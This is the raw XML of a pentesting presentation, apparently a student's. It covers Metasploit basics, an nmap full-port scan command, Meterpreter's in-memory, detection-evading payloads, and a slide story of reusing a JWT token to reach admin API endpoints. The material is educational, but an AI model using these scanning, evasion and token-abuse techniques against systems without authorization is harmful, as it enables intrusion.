              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="39298" b="-1"/>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2" name="Group 11">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 name="Freeform: Shape 12">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6944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66D1-FAED-040F-2A1F-4F6DF45BC930}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Introduction to Metasploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{553AADA4-1C51-AA86-E6FB-0C699BB0B5C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logo with a shield and a letter n&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB32EC3D-2FB3-5675-519D-D86169E786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5113" y="263525"/>
            <a:ext cx="4048126" cy="1562100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7338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7F2405-8E94-8BF9-CF33-CCA5292BC8F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802295-7006-0B1E-F1B2-3609B3210E18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="673770"/>
            <a:ext cx="3220329" cy="2027227"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Key Concepts in Metasploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D18BFE42-6857-AECC-0926-B0B33A50D9D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="99342344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78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269C8-BCAE-85C5-1892-420A6F60C9E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="967853" y="5013474"/>
            <a:ext cx="10640754" cy="775845"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mina Ghattas</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="42" name="Group 41">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43" name="Freeform: Shape 42">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logo with blue text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6FE104F-CE77-F87C-7988-22F5D8D03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48" y="571145"/>
            <a:ext cx="10555905" cy="3333443"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="48" name="Group 47">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49" name="Freeform: Shape 48">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8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AF8E89-894F-04FA-9B30-0EE214FF3F9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0C240-D1A2-DC95-C936-2FE9BA61AA0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Metasploit Basics &amp; Scanning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EEDDDCA-6CDB-CFCB-8AC3-73719D6DD5A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4447308" y="591344"/>
            <a:ext cx="6906491" cy="5585619"/>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Metasploit Overview</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Exploitation framework with two versions: Metasploit Pro (GUI) and Metasploit Framework (open-source, CLI).</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Used for scanning, exploiting vulnerabilities, and post-exploitation tasks.</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Scanning with Nmap</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Nmap Command Breakdown:</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US"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nmap</a:t>
            </a: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sC</a:t>
            </a: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sV</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t> -p- -T4 --min-rate=9326 -</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>vv</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t> [MACHINE IP]</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>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sC</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
              </a:rPr>
              <a:t>: Run target scripts.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sV</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
              </a:rPr>
              <a:t>: Detect versions.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Unicode MS"/>
              </a:rPr>
              <a:t>-p-</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
              </a:rPr>
              <a:t>: Scan all ports.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Unicode MS"/>
              </a:rPr>
              <a:t>T4</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
              </a:rPr>
              <a:t>: Speed up scan.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="2" indent="0" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">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a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="376385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7D52B8-F16E-CC7E-A958-4CCDDC0279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D31F9-9D5E-C2DF-83F7-BCF226A0D10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Meterpreter Overview &amp; Flavors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C03CCA-7046-9BF5-7899-007A35962A2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4447308" y="591344"/>
            <a:ext cx="6906491" cy="5585619"/>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What is Meterpreter?</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A Metasploit payload that runs in memory on the target system, avoiding disk-based detection.</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Encrypts communication between target and attacker, evading IPS/IDS detection.</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Antiviruses may detect its process but it still offers a level of stealth.</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Meterpreter Flavors:</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Inline (Single):</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Sent in one step.</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Staged:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Sent in two steps (stager first, payload next).</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Different payloads based on target OS (Windows, Linux, Android, etc.).</a:t>
            </a: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a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39905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7B73-3018-78DF-696F-9C40FA3C9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D425C-67A9-1E4E-F341-D6468EF4F2CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Meterpreter Commands &amp; Post Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98A0CBA4-0355-7C6C-158A-C150C9CD9B8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4107343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72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564AC1-898F-40AD-F6CE-25344524A5DD}"/>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B776F0E0-C52D-FBAF-6A8F-FDDC0AB52E37}"/>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D196D77-C37D-4E55-8DB6-8E0F4DAE054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4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FA3ED-A673-CD44-7DE8-A77D255F3EF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630936" y="639520"/>
            <a:ext cx="3429000" cy="1719072"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"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42A904-C40D-0606-EA21-745B07AD8894}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630936" y="2807208"/>
            <a:ext cx="3429000" cy="3410712"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>It was a swagger documentation to all the endpoints in the server that the mobile app communicates with.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A screenshot of a chat&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47A171D3-24D8-68C2-EA67-51A1CF59F1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4901" y="1499056"/>
            <a:ext cx="6903720" cy="4300355"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="267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3A0C7-FA80-4F8E-8D68-FF766A975751}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630936" y="639520"/>
            <a:ext cx="3429000" cy="1719072"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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DA4F5-DACE-6854-ADCB-FB93C98177E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630936" y="2807208"/>
            <a:ext cx="3429000" cy="3410712"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>So basically I tried to deal with it by postman and added the JWT token to get the admin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>privileages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> but it kept giving me internal server errors.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A screenshot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95632249-8EBD-E3D1-2C99-8E8A51B0F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296" y="1703069"/>
            <a:ext cx="6903720" cy="4514851"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41291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B5207E-0D59-DD0A-3B7D-CC7B7F766D2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B601D-9222-D54B-75F9-01A809026B36}"/>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36E201D6-F81E-B79F-51C0-DEF6C0FEC20F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1008184" y="1459907"/>
            <a:ext cx="10175630" cy="767904"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>I used a normal curl command with the token added as an authorization header and it worked.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ct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30BF83AC-10E4-23E9-8BF2-A582E01FC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154" y="2510971"/>
            <a:ext cx="10515595" cy="3250334"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23669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040011"/>
            <a:ext cx="6179939" cy="3548857"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="6958"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5583" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Journey Through TryHackMe's Offensive Pentesting Path</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5583" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5292031" y="4897438"/>
            <a:ext cx="6179939" cy="329208"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2583"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1583" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Shape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5292031" y="5473403"/>
            <a:ext cx="329108" cy="329108"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 23151155"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="7620">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 1" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5298381" y="5479753"/>
            <a:ext cx="316408" cy="316408"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5723930" y="5458024"/>
            <a:ext cx="1766788" cy="359966"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2833"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>by ibram anwar</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1257" y="544413"/>
            <a:ext cx="6237486" cy="1234480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4833"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3875" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Introduction to Offensive Pentesting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3875" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="691257" y="2297212"/>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5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="829171" y="2371229"/>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1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2292" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1333004" y="2297212"/>
            <a:ext cx="2676128"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Comprehensive Skill Set</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1917" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1333005" y="2724249"/>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Penetration testers need expertise in web applications, networks, and low-level technologies like assembly.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1542" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="691257" y="3775869"/>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9" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="829171" y="3849886"/>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2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2292" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1333004" y="3775869"/>
            <a:ext cx="2632273"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Industry-Standard Tools</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1917" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1333005" y="4202907"/>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The path teaches use of professional tools and methodologies for finding vulnerabilities.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1542" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Shape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="691257" y="5254526"/>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13" name="Text 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="829171" y="5328544"/>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3</a:t>
            </a:r>
